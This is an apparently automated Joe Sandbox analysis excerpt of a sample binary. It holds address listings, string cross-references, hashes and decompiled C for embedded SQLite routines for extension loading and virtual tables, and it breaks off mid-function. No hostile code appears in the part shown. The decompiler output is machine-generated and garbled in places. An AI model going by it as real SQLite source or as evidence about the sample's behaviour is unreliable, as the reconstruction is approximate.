0x00dcb3a0
0x00000000
0x00000000
0x00dcb3aa
0x00dcb3ab
0x00dcb3ae
0x00dcb3b0
0x00000000
0x00dcb3b2
0x00dcb3b2
0x00dcb3b6
0x00dcb3ba
0x00000000
0x00dcb3ba
0x00000000
0x00dcb3b0
0x00000000
0x00dcb393
0x00dcb38e
0x00dcb388
0x00000000
0x00dcb3be
0x00dcb3be
0x00dcb3c1
0x00dcb3c2
0x00dcb3c5
0x00dcb3c9
0x00dcb3cd
0x00dcb3cd
0x00dcb3d1
0x00000000
0x00dcb3d1
0x00dcb36f
0x00dcb35e
0x00dcb32e
0x00dcb32e
0x00dcb330
0x00dcb4ad
0x00dcb4b2
0x00dcb4b2
0x00dcb4b6
0x00dcb4c3
0x00dcb4c4
0x00dcb4c9
0x00dcb4d3
0x00000000
0x00000000
0x00000000
0x00dcb330
0x00dcb2c4
0x00dcb2c4
0x00dcb2c6
0x00dcb2c8
0x00000000
0x00dcb2ca
0x00dcb2ca
0x00dcb2d0
0x00dcb2d0
0x00dcb2d6
0x00dcb2db
0x00dcb2dd
0x00000000
0x00000000
0x00dcb2e7
0x00dcb2e8
0x00dcb2eb
0x00dcb2ed
0x00000000
0x00dcb2ef
0x00dcb2ef
0x00dcb2f4
0x00000000
0x00dcb2f4
0x00000000
0x00dcb2ed
0x00000000
0x00dcb2d0
0x00dcb2c8
0x00dcb1d2
0x00dcb1d2
0x00dcb1d2
0x00dcb1d4
0x00dcb1e0
0x00dcb1e0
0x00dcb1e2
0x00dcb1e6
0x00dcb1ea
0x00000000
0x00dcb1f0
0x00dcb1f0
0x00dcb1f4
0x00dcb1fc
0x00dcb200
0x00dcb204
0x00dcb206
0x00dcb208
0x00dcb20b
0x00dcb20e
0x00dcb20e
0x00dcb212
0x00dcb215
0x00dcb217
0x00dcb219
0x00dcb219
0x00dcb21f
0x00dcb22a
0x00dcb22f
0x00dcb233
0x00dcb23a
0x00dcb23e
0x00dcb244
0x00000000
0x00dcb24a
0x00dcb24a
0x00dcb24e
0x00dcb252
0x00000000
0x00dcb258
0x00dcb258
0x00dcb25c
0x00dcb25e
0x00dcb260
0x00dcb262
0x00dcb262
0x00dcb265
0x00dcb268
0x00dcb268
0x00dcb262
0x00dcb26c
0x00dcb272
0x00dcb276
0x00dcb281
0x00dcb281
0x00dcb283
0x00dcb286
0x00000000
0x00dcb286
0x00dcb252
0x00dcb244
0x00000000
0x00dcb289
0x00dcb28d
0x00dcb28e
0x00dcb291
0x00dcb295
0x00dcb299
0x00dcb299
0x00000000
0x00dcb1e0
0x00dcb1cc
0x00000000
0x00dcb1a3
0x00000000
0x00dcb112
0x00dcb113
0x00dcb117
0x00dcb11c
0x00dcb123
0x00dcb138
0x00dcb13d
0x00dcb13e
0x00dcb14d
0x00dcb125
0x00dcb12d
0x00dcb132
0x00dcb55f
0x00dcb563
0x00dcb564
0x00dcb565
0x00dcb56f
0x00000000
0x00000000
0x00000000
0x00dcb132
0x00dcb123
0x00dcb110
0x00000000

Strings

a GROUP BY clause is required before HAVING, xrefs: 00DCB4AD
EXCEPT, xrefs: 00DCB51B
UNION ALL, xrefs: 00DCB522, 00DCB527
SELECTs to the left and right of %s do not have the same number of result columns, xrefs: 00DCB528
INTERSECT, xrefs: 00DCB514
all VALUES must have the same number of terms, xrefs: 00DCB4E4
UNION, xrefs: 00DCB50D
aggregate functions are not allowed in the GROUP BY clause, xrefs: 00DCB4D4
GROUP, xrefs: 00DCB439
ORDER, xrefs: 00DCB409

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: EXCEPT$GROUP$INTERSECT$ORDER$SELECTs to the left and right of %s do not have the same number of result columns$UNION$UNION ALL$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause$all VALUES must have the same number of terms
API String ID: 0-2775031899
Opcode ID: 20a3c737f831c0d4a206422d37caf14fb4bf2ed58b040fc7ad577ec0c5800bf0
Instruction ID: 3e21cc5c0fa469ffb735256a2ff54c7e348d1bb2ce2816ebdf6ff685d5d5c49b
Opcode Fuzzy Hash: 20a3c737f831c0d4a206422d37caf14fb4bf2ed58b040fc7ad577ec0c5800bf0
Instruction Fuzzy Hash: 3BE16C706087428FC714CF18C552F6AB7E1FF99728F584A5EE8859B251E731EC42CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DF1170 Relevance: 11.8, Strings: 9, Instructions: 525
COMMONCrypto

Download Yara Rule

C-Code - Quality: 38%

			E00DF1170(intOrPtr* __ecx, signed int __edx, char* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				char* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t123;
				void* _t127;
				intOrPtr _t132;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr _t155;
				intOrPtr _t158;
				intOrPtr _t161;
				intOrPtr _t167;
				intOrPtr _t170;
				intOrPtr* _t175;
				intOrPtr _t176;
				intOrPtr _t180;
				intOrPtr* _t189;
				signed int _t190;
				signed char _t191;
				intOrPtr _t197;
				short _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				intOrPtr _t205;
				void* _t212;
				intOrPtr _t214;
				char _t220;
				intOrPtr* _t233;
				intOrPtr* _t234;
				intOrPtr _t235;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t241;
				intOrPtr* _t243;
				void* _t244;
				intOrPtr _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				signed int _t250;
				signed int _t252;
				intOrPtr _t253;
				intOrPtr* _t259;
				intOrPtr* _t270;
				signed int _t272;
				char* _t274;
				signed char _t277;
				signed int _t278;
				intOrPtr _t290;
				intOrPtr* _t292;
				void* _t293;
				void* _t294;
				intOrPtr* _t295;
				void* _t296;
				intOrPtr* _t297;
				void* _t298;
				void* _t299;
				intOrPtr _t300;
				intOrPtr* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				signed int _t306;
				intOrPtr _t307;
				void* _t308;
				void* _t309;
				intOrPtr _t310;
				void* _t311;
				char* _t312;
				void* _t313;
				void* _t314;
				void* _t315;
				intOrPtr _t316;
				void* _t318;
				void* _t319;
				void* _t320;
				void* _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t328;

				_t324 = (_t322 & 0xfffffff8) - 0x24;
				_t123 =  *0xed8944; // 0xccebfc3b
				_v8 = _t123 ^ _t324;
				_t233 = _a8;
				_t292 = __ecx;
				_v36 = __edx;
				_t306 = _v36;
				_v24 = _a4;
				_v16 = _t233;
				_t286 =  *__ecx;
				_v28 = _t286;
				_v12 = 0;
				if(_t306 != 0) {
					_t250 = _t306;
					_v40 = _t250 + 1;
					goto L3;
					L3:
					_t127 =  *_t250;
					_t250 = _t250 + 1;
					if(_t127 != 0) {
						goto L3;
					} else {
						_t252 = _t250 - _v40 & 0x3fffffff;
					}
				} else {
					_t252 = 0;
				}
				_t13 = _t252 + 0x12c; // 0x12c
				_v20 = _t13;
				if(_t233 != 0) {
					 *_t233 = 0;
				}
				if(( *(_t292 + 0x1c) & 0x00010000) != 0) {
					_t253 = _v24;
					_t130 =  !=  ? _t253 : "sqlite3_extension_init";
					_v40 =  !=  ? _t253 : "sqlite3_extension_init";
					_t132 =  *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x28))))(_t286, _t306);
					_t325 = _t324 + 8;
					_v32 = _t132;
					_t234 = 0xecb964;
					while(_t132 == 0) {
						_push( *_t234);
						_t318 = E00D97560(_t234, _t253, _t286, _t292, "%s.%s", _t306);
						_t328 = _t325 + 0xc;
						if(_t318 == 0) {
							L68:
							_pop(_t293);
							_pop(_t308);
							_pop(_t237);
							return E00E76672(7, _t237, _v8 ^ _t328, _t286, _t293, _t308);
						} else {
							_t214 = _v28;
							_v32 =  *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x28))))(_t214, _t318);
							E00D95050(_t318);
							_t306 = _v36;
							_t234 = _t234 + 4;
							_t132 = _v32;
							_t325 = _t328 + 0xc;
							if(_t234 < 0xecb968) {
								continue;
							} else {
								if(_t132 != 0) {
									break;
								} else {
									_t301 = _v16;
									if(_t301 == 0) {
										goto L87;
									} else {
										if(E00E1EB50(_t253, _t286) == 0) {
											_t245 = _v20;
											_t220 = L00D94E70(_t245, 0);
											_t324 = _t325 + 8;
											_v12 = _t220;
											 *_t301 = _t220;
											if(_t220 == 0) {
												goto L87;
											} else {
												E00D976B0(_t245, _t301, _t245, _t220, "unable to open shared library [%s]", _t306);
												_t290 = _v28;
												 *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x2c))))(_t245 - 1, _v12);
												_t302 = _t290;
												_pop(_t319);
												_pop(_t246);
												return E00E76672(1, _t246, _v8 ^ _t324 + 0x0000001c, _t290, _t302, _t319);
											}
										} else {
											 *_t301 = 0;
											_pop(_t303);
											_pop(_t320);
											_pop(_t247);
											return E00E76672(1, _t247, _v8 ^ _t325, _t286, _t303, _t320);
										}
									}
								}
							}
						}
						goto L103;
					}
					_t254 = _v40;
					_t235 = _v28;
					_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t235 + 0x30))))(_t235, _t132, _v40);
					_t326 = _t325 + 0xc;
					if(_t134 != 0) {
						L56:
						_t135 =  *_t134(_t292,  &_v12, 0xecc170);
						_t327 = _t326 + 0xc;
						if(_t135 == 0) {
							_t236 = 4 +  *(_t292 + 0xb4) * 4;
							_t307 = E00D95440(_t286, 4 +  *(_t292 + 0xb4) * 4, 0);
							_t328 = _t327 + 8;
							if(_t307 == 0) {
								goto L68;
							} else {
								E00E79BD0(_t292, _t307, 0, _t236);
								_t141 =  *(_t292 + 0xb4);
								_t327 = _t328 + 0xc;
								if( *(_t292 + 0xb4) > 0) {
									L00E79650(_t307,  *((intOrPtr*)(_t292 + 0xb8)), _t141 << 2);
									_t327 = _t327 + 0xc;
								}
								_t259 =  *((intOrPtr*)(_t292 + 0xb8));
								if(_t259 != 0) {
									if( *((intOrPtr*)(_t292 + 0x1d0)) == 0) {
										if(_t259 <  *((intOrPtr*)(_t292 + 0x128)) || _t259 >=  *((intOrPtr*)(_t292 + 0x12c))) {
											E00D95050(_t259);
											_t327 = _t327 + 4;
										} else {
											 *_t259 =  *((intOrPtr*)(_t292 + 0x124));
											 *((intOrPtr*)(_t292 + 0x124)) = _t259;
										}
									} else {
										_t286 = _t259;
										E00D950C0(_t292, _t259);
									}
								}
								 *((intOrPtr*)(_t292 + 0xb8)) = _t307;
								 *((intOrPtr*)(_t307 +  *(_t292 + 0xb4) * 4)) = _v32;
								 *(_t292 + 0xb4) =  *(_t292 + 0xb4) + 1;
								goto L102;
							}
						} else {
							if(_t135 == 0x100) {
								L102:
								_pop(_t294);
								_pop(_t309);
								_pop(_t238);
								return E00E76672(0, _t238, _v8 ^ _t327, _t286, _t294, _t309);
							} else {
								_t295 = _v16;
								if(_t295 != 0) {
									_t161 = E00D97560(_t235,  &_v12, _t286, _t295, "error during initialization: %s", _v12);
									_t327 = _t327 + 8;
									 *_t295 = _t161;
								}
								_t310 = _v12;
								if(_t310 != 0) {
									if( *0xed9418 == 0) {
										 *0xed9448(_t310);
										goto L89;
									} else {
										_t155 =  *0xedf228;
										if(_t155 != 0) {
											 *0xed9474(_t155);
											_t327 = _t327 + 4;
										}
										 *0xedf030 =  *0xedf030 -  *0xed9450(_t310);
										 *0xedf054 =  *0xedf054 - 1;
										 *0xed9448(_t310);
										_t158 =  *0xedf228;
										_t327 = _t327 + 8;
										if(_t158 != 0) {
											 *0xed947c(_t158);
											L89:
											_t327 = _t327 + 4;
										}
									}
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t235 + 0x34))))(_v32);
								_t296 = _t235;
								_pop(_t311);
								_pop(_t239);
								return E00E76672(1, _t239, _v8 ^ _t327 + 0x00000008, _t286, _t296, _t311);
							}
						}
					} else {
						if(_v24 != _t134) {
							_t312 = 0;
							goto L70;
						} else {
							if(_t306 != 0) {
								_t254 = _t306 + 1;
								do {
									_t212 =  *_t306;
									_t306 = _t306 + 1;
								} while (_t212 != 0);
								_t306 = _t306 - _t254 & 0x3fffffff;
							}
							if(E00E1EB50(_t254, _t286) != 0) {
								L67:
								 *((intOrPtr*)( *((intOrPtr*)(_t235 + 0x34))))(_t235, _v32);
								_t328 = _t326 + 8;
								goto L68;
							} else {
								_t189 = L00D94E70(_t306 + 0x1e, 0);
								_t326 = _t326 + 8;
								_v24 = _t189;
								if(_t189 == 0) {
									goto L67;
								} else {
									_t315 = _t306 + 0xffffffff;
									 *_t189 = 0x696c7173;
									 *((intOrPtr*)(_t189 + 4)) = 0x5f336574;
									_t190 = _v36;
									if(_t315 >= 0) {
										while( *((char*)(_t190 + _t315)) != 0x2f) {
											_t315 = _t315 - 1;
											if(_t315 >= 0) {
												continue;
											}
											goto L32;
										}
									}
									L32:
									_t287 = 3;
									_t243 = _t315 + 1 + _t190;
									if(_t243 != 0) {
										_t274 = "lib";
										_v40 = _t274;
										while(1) {
											_t191 =  *_t243;
											_t287 = _t287 - 1;
											if(_t191 == 0) {
												break;
											}
											_t278 =  *_t274 & 0x000000ff;
											_t274 = _v40;
											if( *((intOrPtr*)((_t191 & 0x000000ff) + 0xecc550)) ==  *((intOrPtr*)(_t278 + 0xecc550))) {
												_t274 =  &(_t274[1]);
												_t243 = _t243 + 1;
												_v40 = _t274;
												if(_t287 > 0) {
													continue;
												} else {
													_t287 = _t287 - 1;
												}
											}
											break;
										}
										if(_t287 >= 0) {
										}
									} else {
									}
									_t244 = 8;
									_t195 =  !=  ? 1 : 4;
									_t196 = ( !=  ? 1 : 4) + _v36;
									_t277 =  *((char*)(4 + _t315));
									_t286 = ( !=  ? 1 : 4) + _v36 + _t315;
									if(_t277 != 0) {
										_t316 = _v24;
										while(_t277 != 0x2e) {
											if(( *((_t277 & 0x000000ff) + 0xecbc18) & 0x00000002) != 0) {
												_t62 = _t277 + 0xecc550; // 0x4030201
												 *((char*)(_t244 + _t316)) =  *_t62;
												_t244 = _t244 + 1;
											}
											_t277 =  *((char*)(_t286 + 1));
											_t286 = _t286 + 1;
											if(_t277 != 0) {
												continue;
											}
											goto L48;
										}
									}
									L48:
									_t312 = _v24;
									_t197 =  *((intOrPtr*)("_init")); // 0x696e695f
									 *((intOrPtr*)(_t244 + _t312)) = _t197;
									_t198 =  *0xec8fd0; // 0x74
									 *((short*)(_t244 + _t312 + 4)) = _t198;
									_t235 = _v28;
									_v40 = _t312;
									_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t235 + 0x30))))(_t235, _v32, _t312);
									_t326 = _t326 + 0xc;
									_v28 = _t200;
									if(_t200 == 0) {
										L70:
										_t297 = _v16;
										if(_t297 != 0) {
											_t175 = _v40;
											if(_t175 != 0) {
												_t270 = _t175;
												_t286 = _t270 + 1;
												asm("o16 nop [eax+eax]");
												do {
													_t176 =  *_t270;
													_t270 = _t270 + 1;
												} while (_t176 != 0);
												_t272 = _t270 - _t286 & 0x3fffffff;
											} else {
												_t272 = 0;
											}
											_v20 = _v20 + _t272;
											asm("adc eax, eax");
											_v24 = 0;
											if(E00E1EB50(_t272, _t286) == 0) {
												_t180 = L00D94E70(_v20, _v24);
												_t326 = _t326 + 8;
												_v12 = _t180;
												 *_t297 = _t180;
												if(_t180 != 0) {
													_t300 = _v20;
													E00D976B0(_t235, _t300, _t300, _t180, "no entry point [%s] in shared library [%s]", _v40);
													 *((intOrPtr*)( *((intOrPtr*)(_t235 + 0x2c))))(_t235, _t300 - 1, _v12, _v36);
													_t326 = _t326 + 0x20;
												}
											} else {
												 *_t297 = 0;
											}
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t235 + 0x34))))(_t235, _v32);
										_t324 = _t326 + 8;
										if(_t312 == 0) {
											goto L87;
										} else {
											if( *0xed9418 == 0) {
												 *0xed9448(_t312);
												_t324 = _t324 + 4;
												goto L87;
											} else {
												_t167 =  *0xedf228;
												if(_t167 != 0) {
													 *0xed9474(_t167);
													_t324 = _t324 + 4;
												}
												 *0xedf030 =  *0xedf030 -  *0xed9450(_t312);
												 *0xedf054 =  *0xedf054 - 1;
												 *0xed9448(_t312);
												_t170 =  *0xedf228;
												_t324 = _t324 + 8;
												if(_t170 == 0) {
													goto L87;
												} else {
													 *0xed947c();
													_t299 = _t170;
													_pop(_t314);
													_pop(_t241);
													return E00E76672(1, _t241, _v8 ^ _t324 + 0x00000004, _t286, _t299, _t314);
												}
											}
										}
									} else {
										if( *0xed9418 == 0) {
											 *0xed9448(_t312);
											goto L54;
										} else {
											_t202 =  *0xedf228;
											if(_t202 != 0) {
												 *0xed9474(_t202);
												_t326 = _t326 + 4;
											}
											 *0xedf030 =  *0xedf030 -  *0xed9450(_t312);
											 *0xedf054 =  *0xedf054 - 1;
											 *0xed9448(_t312);
											_t205 =  *0xedf228;
											_t326 = _t326 + 8;
											if(_t205 != 0) {
												 *0xed947c(_t205);
												L54:
												_t326 = _t326 + 4;
											}
										}
										_t134 = _v28;
										goto L56;
									}
								}
							}
						}
					}
				} else {
					if(_t233 == 0) {
						L87:
						_pop(_t298);
						_pop(_t313);
						_pop(_t240);
						return E00E76672(1, _t240, _v8 ^ _t324, _t286, _t298, _t313);
					} else {
						_push("not authorized");
						 *_t233 = E00D97560(_t233, _t252, _t286, _t292);
						_pop(_t304);
						_pop(_t321);
						_pop(_t248);
						return E00E76672(1, _t248, _v8 ^ _t324 + 0x00000004, _t286, _t304, _t321);
					}
				}
				L103:
			}

0x00df1176
0x00df1179
0x00df1180
0x00df1188
0x00df118d
0x00df118f
0x00df1193
0x00df1197
0x00df119b
0x00df119f
0x00df11a1
0x00df11a5
0x00df11af
0x00df11b5
0x00df11ba
0x00df11ba
0x00df11c0
0x00df11c0
0x00df11c2
0x00df11c5
0x00000000
0x00df11c7
0x00df11cb
0x00df11cb
0x00df11b1
0x00df11b1
0x00df11b1
0x00df11d1
0x00df11d7
0x00df11dd
0x00df11df
0x00df11df
0x00df11ec
0x00df121c
0x00df1228
0x00df122b
0x00df1233
0x00df1235
0x00df1238
0x00df123c
0x00df1241
0x00df1249
0x00df1256
0x00df1258
0x00df125d
0x00df15a4
0x00df15a9
0x00df15aa
0x00df15ab
0x00df15ba
0x00df1263
0x00df1263
0x00df126f
0x00df1273
0x00df1278
0x00df127c
0x00df127f
0x00df1283
0x00df128c
0x00000000
0x00df128e
0x00df1290
0x00000000
0x00df1296
0x00df1296
0x00df129c
0x00000000
0x00df12a2
0x00df12a9
0x00df12c8
0x00df12d0
0x00df12d5
0x00df12d8
0x00df12dc
0x00df12e0
0x00000000
0x00df12e6
0x00df12ee
0x00df12f7
0x00df1303
0x00df130d
0x00df130e
0x00df130f
0x00df131e
0x00df131e
0x00df12ab
0x00df12ab
0x00df12b6
0x00df12b7
0x00df12b8
0x00df12c7
0x00df12c7
0x00df12a9
0x00df129c
0x00df1290
0x00df128c
0x00000000
0x00df125d
0x00df131f
0x00df1323
0x00df132d
0x00df132f
0x00df1334
0x00df14e8
0x00df14f3
0x00df14f5
0x00df14fa
0x00df1727
0x00df1734
0x00df1736
0x00df173b
0x00000000
0x00df1741
0x00df1745
0x00df174a
0x00df1750
0x00df1755
0x00df1762
0x00df1767
0x00df1767
0x00df176a
0x00df1772
0x00df177b
0x00df178e
0x00df17a9
0x00df17ae
0x00df1798
0x00df179e
0x00df17a0
0x00df17a0
0x00df177d
0x00df177d
0x00df1781
0x00df1781
0x00df177b
0x00df17bb
0x00df17c1
0x00df17c4
0x00000000
0x00df17c4
0x00df1500
0x00df1505
0x00df17ca
0x00df17d0
0x00df17d1
0x00df17d2
0x00df17dd
0x00df150b
0x00df150b
0x00df1511
0x00df151c
0x00df1521
0x00df1524
0x00df1524
0x00df1526
0x00df152c
0x00df1539
0x00df16f0
0x00000000
0x00df153f
0x00df153f
0x00df1546
0x00df1549
0x00df154f
0x00df154f
0x00df1559
0x00df1562
0x00df1569
0x00df156f
0x00df1574
0x00df1579
0x00df1580
0x00df16f6
0x00df16f6
0x00df16f6
0x00df1579
0x00df1539
0x00df1701
0x00df170b
0x00df170c
0x00df170d
0x00df171c
0x00df171c
0x00df1505
0x00df133a
0x00df133e
0x00df15bb
0x00000000
0x00df1344
0x00df1346
0x00df1348
0x00df1350
0x00df1350
0x00df1352
0x00df1353
0x00df1359
0x00df1359
0x00df1366
0x00df1597
0x00df159f
0x00df15a1
0x00000000
0x00df136c
0x00df1372
0x00df1377
0x00df137a
0x00df1380
0x00000000
0x00df1386
0x00df1386
0x00df1389
0x00df138f
0x00df1396
0x00df139a
0x00df13a0
0x00df13a6
0x00df13a9
0x00000000
0x00000000
0x00000000
0x00df13a9
0x00df13a0
0x00df13ab
0x00df13ae
0x00df13b3
0x00df13b5
0x00df13bc
0x00df13c1
0x00df13c5
0x00df13c5
0x00df13c7
0x00df13ca
0x00000000
0x00000000
0x00df13cc
0x00df13de
0x00df13e2
0x00df13e4
0x00df13e5
0x00df13e6
0x00df13ec
0x00000000
0x00df13ee
0x00df13ee
0x00df13ee
0x00df13ec
0x00000000
0x00df13e2
0x00df13f1
0x00df13f1
0x00df13b7
0x00df13b7
0x00df1419
0x00df141e
0x00df1421
0x00df1425
0x00df1429
0x00df142e
0x00df1430
0x00df1434
0x00df1443
0x00df1445
0x00df144b
0x00df144e
0x00df144e
0x00df144f
0x00df1453
0x00df1456
0x00000000
0x00000000
0x00000000
0x00df1456
0x00df1434
0x00df1458
0x00df1458
0x00df145c
0x00df1466
0x00df1469
0x00df146f
0x00df1474
0x00df1479
0x00df1480
0x00df1482
0x00df1485
0x00df148b
0x00df15bd
0x00df15bd
0x00df15c3
0x00df15c9
0x00df15cf
0x00df15d5
0x00df15d7
0x00df15da
0x00df15e0
0x00df15e0
0x00df15e2
0x00df15e3
0x00df15e9
0x00df15d1
0x00df15d1
0x00df15d1
0x00df15ef
0x00df15f8
0x00df15fa
0x00df1605
0x00df1618
0x00df161d
0x00df1620
0x00df1624
0x00df1628
0x00df1632
0x00df163e
0x00df1652
0x00df1654
0x00df1654
0x00df1607
0x00df1607
0x00df1607
0x00df1605
0x00df165f
0x00df1661
0x00df1666
0x00000000
0x00df1668
0x00df166f
0x00df16cf
0x00df16d5
0x00000000
0x00df1671
0x00df1671
0x00df1678
0x00df167b
0x00df1681
0x00df1681
0x00df168b
0x00df1694
0x00df169b
0x00df16a1
0x00df16a6
0x00df16ab
0x00000000
0x00df16ad
0x00df16ae
0x00df16bc
0x00df16bd
0x00df16be
0x00df16cd
0x00df16cd
0x00df16ab
0x00df166f
0x00df1491
0x00df1498
0x00df158c
0x00000000
0x00df149e
0x00df149e
0x00df14a5
0x00df14a8
0x00df14ae
0x00df14ae
0x00df14b8
0x00df14c1
0x00df14c8
0x00df14ce
0x00df14d3
0x00df14d8
0x00df14db
0x00df14e1
0x00df14e1
0x00df14e1
0x00df14d8
0x00df14e4
0x00000000
0x00df14e4
0x00df148b
0x00df1380
0x00df1366
0x00df133e
0x00df11ee
0x00df11f0
0x00df16d8
0x00df16dd
0x00df16de
0x00df16df
0x00df16ee
0x00df11f6
0x00df11f6
0x00df1200
0x00df120a
0x00df120b
0x00df120c
0x00df121b
0x00df121b
0x00df11f0
0x00000000

Strings

error during initialization: %s, xrefs: 00DF1517
%s.%s, xrefs: 00DF124C
lib, xrefs: 00DF13BC
sqlite3_extension_init, xrefs: 00DF1220
not authorized, xrefs: 00DF11F6
te3_, xrefs: 00DF138F
unable to open shared library [%s], xrefs: 00DF12E7
no entry point [%s] in shared library [%s], xrefs: 00DF1637
_init, xrefs: 00DF145C

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_extension_init$te3_$unable to open shared library [%s]
API String ID: 0-842236153
Opcode ID: dc79d044bdbacffed13216474f113c4334784d3e11689ca62078020b38491d7b
Instruction ID: a7897ae5bdc48e9706224070bac2eef431e58a2a9bdd33f553049469a3ab9f5e
Opcode Fuzzy Hash: dc79d044bdbacffed13216474f113c4334784d3e11689ca62078020b38491d7b
Instruction Fuzzy Hash: 210204746043018FC714CF69E881B7AB7E9FF89314F098129F99AE7252E735D905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DC5370 Relevance: 10.6, Strings: 8, Instructions: 570
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00DC5370(signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed char* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32) {
				signed int _v8;
				short _v88;
				signed int _v408;
				signed int _v412;
				signed int _v440;
				signed int _v444;
				signed int _v460;
				signed int _v480;
				signed int _v484;
				signed int* _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				signed int _v500;
				intOrPtr _v504;
				signed char* _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				intOrPtr _v524;
				short _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t250;
				signed int _t257;
				signed int _t261;
				signed int _t267;
				intOrPtr _t282;
				signed int _t288;
				signed int _t294;
				intOrPtr _t301;
				intOrPtr _t303;
				signed int _t305;
				intOrPtr _t311;
				intOrPtr _t326;
				signed int _t327;
				intOrPtr _t328;
				intOrPtr* _t330;
				signed int _t332;
				signed int _t334;
				signed int _t342;
				intOrPtr* _t347;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				void* _t357;
				signed int _t358;
				intOrPtr _t359;
				intOrPtr _t360;
				void* _t364;
				intOrPtr _t366;
				signed int _t367;
				signed char _t368;
				intOrPtr* _t370;
				signed int _t373;
				signed int _t380;
				intOrPtr _t386;
				short _t388;
				signed int _t393;
				intOrPtr* _t397;
				signed int _t398;
				intOrPtr* _t400;
				signed int _t403;
				signed int _t408;
				void* _t410;
				signed int _t419;
				intOrPtr _t424;
				intOrPtr* _t425;
				intOrPtr _t426;
				signed int _t428;
				void* _t429;
				signed int _t430;
				char* _t431;
				intOrPtr* _t432;
				signed int _t434;
				signed int _t435;
				void* _t436;
				signed int _t437;
				intOrPtr _t438;
				intOrPtr _t439;
				signed int _t440;
				intOrPtr _t441;
				signed int _t442;
				void* _t444;
				signed int _t445;
				signed int _t447;
				void* _t448;
				void* _t449;
				signed int _t450;

				_t412 = __edx;
				_t447 = (_t445 & 0xfffffff8) - 0x224;
				_t250 =  *0xed8944; // 0xccebfc3b
				_v8 = _t250 ^ _t447;
				_t370 = _a32;
				_v508 = _a16;
				_v496 = _a8;
				_v492 = _a12;
				_t354 = 0;
				_v488 = _t370;
				_t428 = _a4;
				_v540 = 0;
				 *_t370 = 0;
				_v516 = 0 | _a28 != 0x00000000;
				_t257 =  *(_t428 + 0xc);
				_v544 = _t428;
				_v500 = 0;
				_v532 = 0;
				if(_t257 != 0) {
					 *0xed9474(_t257);
					_t447 = _t447 + 4;
				}
				_t434 = E00D95440(_t412, 0x20, 0);
				_t448 = _t447 + 8;
				_v548 = _t434;
				if(_t434 != 0) {
					asm("xorps xmm0, xmm0");
					asm("movups [esi], xmm0");
					asm("movups [esi+0x10], xmm0");
				}
				while(1) {
					E00E79BD0(_t428,  &_v484, 0, 0x1d8);
					_t449 = _t448 + 0xc;
					if(_t434 == 0) {
						break;
					}
					_v484 = _t428;
					if(_t354 == 0) {
						L12:
						_v532 = 0;
						_v512 = 0;
						if( *((intOrPtr*)(_t428 + 0x51)) == 0) {
							E00DA6DF0(_t428);
						}
						_t359 = _v492;
						_t412 = E00DDA460( &_v484, 0, _t359, _v496);
						_t449 = _t449 + 8;
						_v536 = _t412;
						if(_t412 == 0) {
							L103:
							_t288 = _v480;
							__eflags = _t288;
							if(_t288 != 0) {
								_v532 = _t288;
								_v480 = 0;
							}
							__eflags =  *((char*)(_t428 + 0x51));
							_v540 = 1;
							if( *((char*)(_t428 + 0x51)) == 0) {
								L00DA6E40(_t428);
							}
							_t355 = _v532;
							goto L89;
						} else {
							if( *((intOrPtr*)(_t412 + 0x38)) != 0) {
								_push(_t359);
								_push("cannot open virtual table: %s");
								L102:
								_push( &_v484);
								E00D981E0(__eflags);
